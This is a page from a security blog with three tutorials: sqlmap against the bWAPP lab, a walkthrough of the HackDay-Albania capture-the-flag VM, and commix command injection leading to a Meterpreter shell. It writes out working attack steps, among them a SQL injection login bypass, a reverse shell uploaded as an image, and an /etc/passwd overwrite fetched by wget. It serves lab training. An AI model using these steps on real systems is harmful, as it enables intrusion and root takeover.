Hacking Articles|Raj Chandel's Blog

Database Penetration Testing using Sqlmap

at 9:37 AM Tuesday, December 6, 2016 0 comments

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Ø Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

Ø Enumerate users, password hashes, privileges, roles, databases, tables and columns.

Ø Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

Ø Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.

Ø Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

For more details visit their official site sqlmap.org

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any name of movie in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs

This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.

I want to know columns details of blog table using above as I have got it as you can see in image given below.

This command fetches all columns of blog table. It shows there are 4 columns with their data types.

To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

We have got all columns of users table with their data types.

Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.

In same way this tool has fetched all columns with their data types under movie table.

Again I want to penetrate its column so I will use same command by modifying its table name.

Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.

Once again repeat the whole process for table heroes.

We have 4 columns with their data types.

For more information repeat the process which will dump details under its columns.

We have got id, login, password and secret entries. Read the details from table.

Again repeat the same process for our last table which is visitors.

Table visitors are also having 4 columns with its data types.

Let’s penetrate its columns also

Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.

We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.

Awesome!!! We got the shell.

os-shell> net users

Hack the Hackday Albania VM (CTF Challenge)

at 9:27 AM Monday, December 5, 2016 0 comments

Hello friends!! Today we are going to solve another CTF challenge “HackDay-Albania” which is presented by Vulnhub.com and designed by R-73eN for the beginners who want to practice OSCP lab challenges. You can download it from here: https://www.vulnhub.com/entry/hackday-albania,167/

Level: beginner to intermediate

Task: Boot to Root

Penetration Methodologies

· Network Scanning (Nmap, Netdiscover)

· Use Robot.txt

· Apply SQL Injection

· Upload PHP reverse Shell

· Get netcat session

· Edit etc/passwd file

· Get Root access and capture the Flag

Walkthrough

First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.127.

Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.

nmap -A 192.168.1.127

Here you can observer that port 22 and 8008 are opened, also you can observe there is robot.txt file in which 15 entries are allowed and 26 are disallowed.

Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting. The message in the box translates to- “if I am, I know where to go :)”

We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here.

Then I try some of entries of the robot.txt list which I found from Nmap scanning result and fortunately by exploring /unisxcudkqjydw/ in the browser I got another directory name “/vulnbank/”.

So again I explore a new URL in that browser and found a client folder from inside the Index page,

http://192.168.1.127:8008/unisxcudkqjydw/vulnbank/

Clicking on the /client directory, we are greeted by a login page of very secure bank But we don’t have login credential.

Therefore, I try SQL injections for username and password and luckily following parameters get matched.

Username: ‘ or ‘a’ = ‘a’ --

Password: #

And it opened up like a beautiful treasure! As you can see, according this web page “contact Support” here we can attached our file and can discuss our problem.

So, here is what we did.

Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php

Open it with text editor and add listening IP and port and save this file as php-reverse-shell.jpg and start netcat at listening port.

Then uploaded our PHP shell and execute to get reverse connection at netcat.

nc -lvp 1234

From given below image you can observe netcat session. But the task is not finished yet, still, we need to penetrate more for privilege escalation. Then to access proper TTY shell we had import python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

Then I check permission for passwd file and found that the file is writable.

ls -al /etc/passwd

So I open the file with cat command and select the copied whole content into a text file.

cat /etc/passwd

In a new terminal we are using openssl to make a new password hash combined salt value and password in MD5 algorithm. For this the below command is used:

openssl passwd -1 -salt ignite pass123

Now copy this salt password and then open the text file where you copied /etc/passwd content.

Then we create a new entry for user “raj” and past above salt password. Also set UID and GID 0:0 for him to add him into root group member and save file as passwd on the desktop. Now we have to transfer this file into victim’s machine so that we can replace it from original passwd file. Now run the web server on the Kali machine:

python -m SimpleHTTPServer 80

Now download the newly modify passwd file inside /tmp directory and then copy the downloaded file into /etc/passwrd which will overwrite the content of original passwd file.

cd /tmp

wget http://192.168.1.128/passwd

cp passwd /etc/passwd

When you have done above said steps then switch to your new user and try to gain root access.

su raj

cd /root

cat flag.txt

Wonderful!! We have gained access and capture the flag.

Powershell Injection Attacks using Commix and Magic Unicorn

at 6:50 AM Friday, December 2, 2016 0 comments

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the link web Pentest lab setup using bwapp here.

Our task is to get meterpreter shell through os command injection-Blind attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!!!!

Set the security level low, from list box choose your bug select os command injection-Blind now and click on hack.

Type your IP in the text field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to PING button.

Look at image you will find that I have got the details.

Open the terminal in kali Linux and type the commix command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command

commix --url="http://192.168.1.101:81/bWAPP/commandi_blind.php" --data="target=target=192.168.1.101&form=submit" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2"

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Commix found the target seems injectable via blind injection techniques and will further ask for pseudo terminal.

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Option asks by commix to set backdoor for connection Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type '7' to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) >2

Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.

Once metasploit framework gets loaded and starts the payload handler; come back to your previous terminal and press enter. As it is mention in image.

Luckly!! We succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Same task we going to perform with same process but with another type of vulnerability. Set the security level low, from list box choose your bug select os command injection now and click on hack.

Type your IP in the DNS lookup field and just after that start the burp suite and set manual proxy of browser. Click on proxy tag then click to inception is on button, come back to bWAPP and now click to Lookup.